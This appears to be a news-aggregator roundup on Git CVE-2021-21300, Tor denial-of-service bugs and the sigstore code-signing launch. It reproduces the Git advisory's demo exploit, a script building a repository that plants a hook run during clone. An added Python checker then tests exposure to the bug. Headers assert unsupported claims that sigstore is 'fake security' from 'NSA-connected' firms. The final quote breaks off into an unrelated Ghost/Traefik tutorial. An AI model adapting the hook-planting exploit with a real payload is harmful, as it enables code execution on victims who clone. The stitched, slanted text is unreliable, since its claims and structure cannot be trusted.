
Security: Git, Tor, and Fake (Monopolised, Centralised) 'Security' From Linux Foundation

Filed under: Software, Security
  • "git clone" Hit By Vulnerability That Could Lead To Code Execution

    Disclosed today is CVE-2021-21300 as a security vulnerability affecting git clone that could lead to specially crafted repositories being able to execute code during the Git clone process.

    Git versions back to v2.15 are affected by this security vulnerability. Specially crafted repositories could execute code during the git clone process on case-insensitive file-systems supporting symbolic links. The vulnerability stems from clean/smudge filters being abused like those used by Git LFS.

  • The Tor Software Has Two Potential Denial Of Service Vulnerabilities, Fix Is Coming Next Week

    Current and previous versions of the Tor Onion Router software have two undisclosed Denial Of Service vulnerabilities with the potential to cause problems for the Tor network's authority servers. The Torproject will release a new version with a fix "early next week". Everyone who is using Tor Browser or running a Tor node should upgrade when it becomes available.

  • Linux Foundation Announces Free sigstore Signing Service to Confirm Origin and Authenticity of Software

    The Linux Foundation, the nonprofit organization enabling mass innovation through open source, today announced the sigstore project. sigstore improves the security of the software supply chain by enabling the easy adoption of cryptographic software signing backed by transparency log technologies.

    sigstore will empower software developers to securely sign software artifacts such as release files, container images and binaries. Signing materials are then stored in a tamper-proof public log. The service will be free to use for all developers and software providers, with the sigstore code and operation tooling developed by the sigstore community. Founding members include Red Hat, Google and Purdue University.

    “sigstore enables all open source communities to sign their software and combines provenance, integrity and discoverability to create a transparent and auditable software supply chain,” said Luke Hinds, Security Engineering Lead, Red Hat office of the CTO. “By hosting this collaboration at the Linux Foundation, we can accelerate our work in sigstore and support the ongoing adoption and impact of open source software and development.”

  • Industry-Wide Initiative to Support Open Source Security Gains New Commitments

    OpenSSF, a cross-industry collaboration to secure the open source ecosystem, today announced new membership commitments to advance open source security education and best practices. New members include Citi, Comcast, DevSamurai, Hewlett Packard Enterprise (HPE), Mirantis, and Snyk.

    Open source software (OSS) has become pervasive in data centers, consumer devices and services, representing its value among technologists and businesses alike. Because of its development process, open source has a chain of contributors and dependencies before it ultimately reaches its end users. It is important that those responsible for their user or organization’s security are able to understand and verify the security of this dependency supply chain.

"This vulnerability affects platforms with case-insensitive..."

  • git: malicious repositories can execute remote code while cloning
    Team,
    
    The Git project released new versions on Tuesday, March 9th 2021
    addressing CVE-2021-21300.
    
    This vulnerability affects platforms with case-insensitive filesystems
    with support for symbolic links, when certain clean/smudge filters are
    configured globally (e.g. Git LFS).
    
    The fixed versions are v2.17.6, v2.18.5, v2.19.6, v2.20.5, v2.21.4,
    v2.22.5, v2.23.4, v2.24.4, v2.25.5, v2.26.3, v2.27.1, v2.28.1, v2.29.3,
    and v2.30.2.
    
    Link to the announcement:
    https://lore.kernel.org/git/xmqqim6019yd.fsf@gitster.c.googlers.com/T/#u
    
    We highly recommend upgrading.
    
    The addressed issue is:
    
    * CVE-2021-21300:
      On case-insensitive filesystems, with support for symbolic links,
      if Git is configured globally to apply delay-capable clean/smudge
      filters (such as Git LFS), Git could be fooled into running
      remote code during a clone.
    
      Demo exploit:
    
      #!/bin/sh
    
      git init delayed-checkout &&
      (
      	cd delayed-checkout &&
      	echo "A/post-checkout filter=lfs diff=lfs merge=lfs" \
      		>.gitattributes &&
      	mkdir A &&
      	printf '#!/bin/sh\n\necho PWNED >&2\n' >A/post-checkout &&
      	chmod +x A/post-checkout &&
      	>A/a &&
      	>A/b &&
      	git add -A &&
      	rm -rf A &&
      	ln -s .git/hooks a &&
      	git add a &&
      	git commit -m initial
      ) &&
      git clone delayed-checkout cloned
    
      With Git LFS enabled globally, this will print "PWNED" during the clone
      on case-insensitive file systems with support for symbolic links (such
      as NTFS, HFS+, etc).
    
    Credit for finding the vulnerability goes to Matheus Tavares who also
    worked with me on fixing it.
    
    Thanks,
    Johannes
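
A defender's pre-checkout exposure check for the three conditions the announcement lists (a vulnerable Git version, a globally configured delay-capable filter, and a tree symlink that resolves into .git), added here as an example and not part of the announcement or the Git project. The fixed-version table is copied from the message above; the rule that any release newer than v2.30.2 carries the fix, and the helper and function names, are assumptions.

```python
"""Exposure check for CVE-2021-21300 (added example, not part of the Git
announcement above). The pure functions run offline on constructed input;
collect_live_inputs() is an optional wrapper around a real git binary."""
import posixpath
import re
import subprocess

# Fixed patch level per 2.x minor release, copied from the announcement above.
FIXED_PATCH = {17: 6, 18: 5, 19: 6, 20: 5, 21: 4, 22: 5, 23: 4, 24: 4,
               25: 5, 26: 3, 27: 1, 28: 1, 29: 3, 30: 2}
FIRST_AFFECTED_MINOR = 15  # "Git versions back to v2.15 are affected"

def classify_git_version(version: str) -> str:
    """'not_affected', 'vulnerable' or 'fixed' for strings like 'v2.30.1'.
    Assumption: any release newer than v2.30.2 carries the fix."""
    m = re.match(r"v?(\d+)\.(\d+)(?:\.(\d+))?", version.strip())
    if not m:
        raise ValueError(f"unrecognised git version: {version!r}")
    major, minor, patch = int(m[1]), int(m[2]), int(m[3] or 0)
    if major < 2 or (major == 2 and minor < FIRST_AFFECTED_MINOR):
        return "not_affected"
    if major > 2 or minor > max(FIXED_PATCH):
        return "fixed"
    if minor in FIXED_PATCH:
        return "fixed" if patch >= FIXED_PATCH[minor] else "vulnerable"
    return "vulnerable"  # v2.15 and v2.16 received no fixed release

def delay_capable_filters(config_lines) -> list:
    """Filter drivers with a long-running 'process' command (the delay-capable
    kind the advisory names, e.g. Git LFS), parsed from the output of
    `git config --global --get-regexp` for keys of the form filter.NAME.process."""
    hits = [re.match(r"filter\.([^.]+)\.process(\s|$)", line) for line in config_lines]
    return [m[1] for m in hits if m]

def symlinks_into_git_dir(symlinks) -> list:
    """From (path, target) pairs for a repo's symbolic links, return those that
    resolve into .git, as the demo's 'a -> .git/hooks' does. Case is ignored
    because the bug only bites on case-insensitive filesystems."""
    found = []
    for path, target in symlinks:
        resolved = posixpath.normpath(
            posixpath.join(posixpath.dirname(path), target.strip()))
        if any(part.lower() == ".git" for part in resolved.split("/")):
            found.append((path, resolved))
    return found

def exposure_report(version, config_lines, symlinks) -> dict:
    """One verdict from the three signals. Filesystem case-sensitivity is not
    probed here; the reviewer judges that for the target machine."""
    status = classify_git_version(version)
    filters = delay_capable_filters(config_lines)
    links = symlinks_into_git_dir(symlinks)
    return {"git": status, "filters": filters, "symlinks": links,
            "at_risk": status == "vulnerable" and bool(filters) and bool(links)}

def collect_live_inputs(repo):
    """Optional: gather the same inputs from the installed git and from a clone
    made with `git clone --no-checkout`, so that no filter has run yet."""
    def git(*args):
        return subprocess.run(["git", *args], capture_output=True, text=True).stdout
    version = git("--version").split()[2]          # "git version 2.30.1 ..."
    config = git("config", "--global", "--get-regexp", r"filter\..*\.process")
    links = []
    for line in git("-C", repo, "ls-tree", "-r", "HEAD").splitlines():
        meta, path = line.split("\t", 1)
        mode, _kind, sha = meta.split()
        if mode == "120000":                       # symlink; blob is the target
            links.append((path, git("-C", repo, "cat-file", "-p", sha)))
    return version, config.splitlines(), links
```

Feed the tuple returned by collect_live_inputs() straight into exposure_report(); because the clone was made with --no-checkout, the review happens before any clean/smudge filter could execute.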
    

Windows issue (mostly)

  • A Git security release

    Several new versions of the Git source-code management system have been released; they fix a vulnerability that could allow a hostile remote repository to execute code locally during a clone operation. Only users with case-insensitive filesystems are affected, reducing the set of possible targets considerably, but an update still seems like a good idea.

"Linux Foundation serves up free code-signing service"

  • Sign of the primes: Linux Foundation serves up free code-signing service • The Register

    The Linux Foundation, with the support of Google, Red Hat, and Purdue University, is launching a service called sigstore to help developers sign the code they release.

    Signing code involves associating a cryptographic signature with a specific digital artifact – release files, container images, and binaries – so that the person using the software can check the code's signature to verify that the release is authentic and hasn't been altered by someone along the way.

    "Sigstore enables all open source communities to sign their software and combines provenance, integrity and discoverability to create a transparent and auditable software supply chain," said Luke Hinds, security engineering lead in Red Hat's office of the CTO, in a statement.

  • Linux Foundation announces new open-source software signing service | ZDNet

    The just-announced sigstore aims to improve the security of the software supply chain by enabling the easy adoption of cryptographic software signing backed by transparency log technologies. It will do this by empowering developers to securely sign software artifacts such as release files, container images, and binaries. These signing records will then be kept in a tamper-proof public log. This service will be free for all developers and software providers to use. The sigstore code and operation tooling that will be used to make this work is still being developed by the sigstore community.

Monopolists trying to centralise application trust

  • Sigstore is a Let’s Encrypt Like Software Signing Service for Open Source Software

    It’s evident that security for anything is a top priority now. And, ensuring that the software you use is genuine and developed by the original developers is even more important.

    Of course, there will always be pirated or modded software available but even with that, if they utilize code signing, you will be able to verify the source (if you trust them in the first place).

    Even though software signing is important and has a ton of benefits to ensure the integrity of the software, code signing isn’t something adopted by many developers.

IBM and Google are centralising and monopolising trust

  • Linux Foundation Debuts Sigstore Project for Software Signing

    Sigstore aims to improve the open source software supply chain by simplifying the process of cryptographic software signing.

  • Linux Foundation Debuts Sigstore Project for Software Signing

    The Linux Foundation has announced the launch of Sigstore, a new nonprofit initiative that aims to improve open source software supply chain security by making it easier for developers to adopt cryptographic signing for different components of the software development process.

  • Linux Foundation Project Secures Software Supply Chains - DevOps.com

    The Linux Foundation today embraced a sigstore project founded by Red Hat, Google and Purdue University to make it simpler for developers to employ cryptographic software, enabled by transparency log technologies, to secure software supply chains.

  • Linux Foundation is making it easier to verify the authenticity of software

    In a bid to secure the open source software supply chain, the Linux Foundation, together with Red Hat, Google, and Purdue University have combined to launch a new project to help developers cryptographically sign their software.

    Considering the constant increase in the rate of industrial adoption of open source software, the project, called sigstore, aims to prevent an attack on a public software repository from injecting tainted code in the supply chain.

    “sigstore enables all open source communities to sign their software and combines provenance, integrity and discoverability to create a transparent and auditable software supply chain,” said Luke Hinds, Security Engineering Lead, Red Hat office of the CTO.

  • Linux Foundation launches free service to verify software authenticity

    The Linux Foundation, the non-profit organization enabling innovation through open source, has announced a new service to improve the security of the software supply chain by enabling the easy adoption of cryptographic software signing.

    Called 'sigstore' it will allow software developers to securely sign software artifacts such as release files, container images and binaries. Signing materials will then be stored in a tamper-proof public log. Founding members of the project include Red Hat, Google and Purdue University.

  • Linux Foundation launches software signing service

    The Linux Foundation is launching “sigstore,” a free-to-use software signing certificate authority open to all developers.

    Code signing cryptographically authenticates that software has not been tampered with before installation. It can be a valuable tool to prevent hackers from co-opting patching systems or software distribution to deliver malware.

    But it can be a difficult feature for open source software producers to leverage, given the complexities of the process and key management.

NSA-connected spy companies promise us "tamper-proof encryption"

  • The Linux Foundation's "sigstore" project

    The Linux Foundation has announced a project called sigstore; its purpose is to protect against supply-chain attacks by signing (and verifying) release artifacts. "Very few open source projects cryptographically sign software release artifacts. This is largely due to the challenges software maintainers face on key management, key compromise / revocation and the distribution of public keys and artifact digests. In turn, users are left to seek out which keys to trust and learn steps needed to validate signing. Further problems exist in how digests and public keys are distributed, often stored on websites susceptible to hacks or a README file situated on a public git repository. sigstore seeks to solve these issues by utilization of short lived ephemeral keys with a trust root leveraged from open and auditable public transparency logs."

  • The Linux Foundation Launches sigstore, a New Software Signing Service

    The Linux Foundation is launching its new sigstore project to provide better security and protection for all aspects of the software supply chain. The new project will enable developers to sign specific aspects of their development process, ensuring that files and other assets carry strong, tamper-proof encryption.

Outsourcing Linux trust to monopolies with terrible record

  • Sigstore is a Linux Foundation project developed by Google and Red Hat for code signing

    An inherent weakness of open source code is that it's difficult to determine its provenance and how it was built, which means that it's prone to supply chain attacks. Google aims to solve this problem which is why it has collaborated with Red Hat and Smallstep to introduce Sigstore (stylized "sigstore") in the Linux Foundation, making it easier to digitally sign and verify source code.

    [...]

    As it currently stands, sigstore has a fully functioning transparency log, but the WebPKI and client signing tooling is still in the prototyping stage and is not ready for general use. The tool is open source and free to use for all developers. The development team thinks that there are no privacy concerns involved as sigstore does not need access to any personal information except the OpenID Connect grant, which will contain the user's email address. Future plans for sigstore include introducing support for other OpenID Connect providers, updating the documentation, completing the development of the remaining signing infrastructure, and hardening the system for general use. You can find out more about the project on the dedicated website here.

Another puff piece

  • Google and Red Hat team up with Linux Foundation for software-signing service

    The Linux Foundation has launched a free-to-use service for open source developers to cryptographically sign software to reassure users further down the supply chain that the software they’re using is legitimate.

    Developed in partnership with Google and Red Hat, the sigstore project will allow the open source community to sign software artefacts including release files, container images and binaries before these elements are stored in a public log.

Trusting NSA enablers for supply chain checks

  • Linux Foundation boosts security with crypto signing and ID credentialing groups

    The Linux Foundation has launched a “sigstore” project for improving software security via crypto software signing and transparency logs. The LF also announced new members for OpenSSF and launched a “DizmeID Foundation” for digital ID credentialing.

    The Linux Foundation announced the launch of a sigstore project for cryptographic software signing and announced new members for its Open Source Security Foundation (OpenSSF). Other recent Linux Foundation security announcements include the launch of a DizmeID Foundation for digital ID credentialing and a new commitment from Google and the LF to prioritize funds to underwrite two full-time maintainers for Linux kernel security development (see farther below).

Microsoft boosters support centralisation and monopolisation...

Linux Foundation PR/media partner TechRepublic

  • A new Linux Foundation open source signing tool could make secure software supply chains universal [Ed: Linux Foundation PR/media partner TechRepublic the latest to promote fake security]

    Called sigstore, the new cryptographic signing platform uses public logging similar to (but not the same as) cryptocurrencies and other blockchain technologies, the end result of which eliminates many of the security risks associated with traditional digital signing technologies. As opposed to using actual blockchains, sigstore uses transparency logs, which it said are more resilient to majority attacks, avoid canonicalization and are more mature.

Sigstore Project Aims to Monopolise Software Supply Chain

More puff pieces

How Open Source is responding to IT's Pearl Harbor.

Free sigstore signing service confirms software origin....

  • Free sigstore signing service confirms software origin and authenticity

    sigstore will empower software developers to securely sign software artifacts such as release files, container images and binaries. Signing materials are then stored in a tamper-proof public log. The service will be free to use for all developers and software providers, with the sigstore code and operation tooling developed by the sigstore community. Founding members include Red Hat, Google and Purdue University.

    “sigstore enables all open source communities to sign their software and combines provenance, integrity and discoverability to create a transparent and auditable software supply chain,” said Luke Hinds, Security Engineering Lead, Red Hat office of the CTO. “By hosting this collaboration at the Linux Foundation, we can accelerate our work in sigstore and support the ongoing adoption and impact of open source software and development.”

Sigstore Is A New And Free Code Signing Service By Linux Fdn.

  • Sigstore Is A New And Free Code Signing Service By Linux Foundation

    The Sigstore project will enable developers to sign specific aspects of their development process. This will ensure that files and other assets carry strong, tamper-proof encryption.

    The Linux Foundation today announced the sigstore project. Founding members include Red Hat, Google and Purdue University. Sigstore improves the security of the software supply chain. It enables the easy adoption of cryptographic software signing backed by transparency log technologies.

    An inherent weakness of open source code is that it’s difficult to determine its provenance and how it was built. That means that it’s prone to supply chain attacks.

Still shilling monopoly disguised as 'security'

  • Linux Foundation Sigstore Aims to Be the Let's Encrypt of Code Signing

    Backed by the Linux Foundation, Sigstore aims to provide a non-profit service to foster the adoption of cryptographic signing by open source projects to make the software supply chain more secure.

    The main issue Sigstore attempts to tackle is the difficulty of knowing the origin of a piece of software, or how it was built. This becomes especially tricky when that software is included in a larger project, paving the way to external attacks. As Google security engineers Kim Lewandowski and Dan Lorenc put it introducing the initiative,


    Ghost is a very popular open-source content management system. Started as an alternative to WordPress and it went on to become an alternative to Substack by focusing on membership and newsletter. The creators of Ghost offer managed Pro hosting but it may not fit everyone's budget. Alternatively, you can self-host it on your own cloud servers. On Linux handbook, we already have a guide on deploying Ghost with Docker in a reverse proxy setup. Instead of Ngnix reverse proxy, you can also use another software called Traefik with Docker. It is a popular open-source cloud-native application proxy, API Gateway, Edge-router, and more. I use Traefik to secure my websites using an SSL certificate obtained from Let's Encrypt. Once deployed, Traefik can automatically manage your certificates and their renewals. In this tutorial, I'll share the necessary steps for deploying a Ghost blog with Docker and Traefik.